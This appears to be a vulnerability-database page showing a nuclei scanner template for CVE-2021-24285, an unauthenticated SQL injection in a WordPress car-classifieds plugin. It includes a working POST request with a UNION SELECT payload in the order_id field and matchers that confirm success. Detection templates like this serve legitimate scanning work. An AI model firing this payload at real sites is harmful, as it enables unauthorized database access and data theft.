Lucene search
K

WordPress Car Seller - Auto Classifieds Script - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0 allows SQL Injection via order_id parameter, leading to potential unauthorized access, data leakage, or data manipulation

Related
Refs
Code
id: CVE-2021-24285

info:
  name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
  author: ShreyaPohekar
  severity: critical
  description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.
  reference:
    - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
    - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
    - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/SexyBeast233/SecBooks
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24285
    cwe-id: CWE-89
    epss-score: 0.14697
    epss-percentile: 0.96255
    cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: cars-seller-auto-classifieds-script_project
    product: cars-seller-auto-classifieds-script
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eb35a3d9ad81fb97f8d901b4ccbe3d7d93f01e0577e11224b75ce7b8495006ee022100dbb79f6b86d392b70c36784d5a624bd4b398dd1674766c61a15eba62d0aeacda:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.14697
42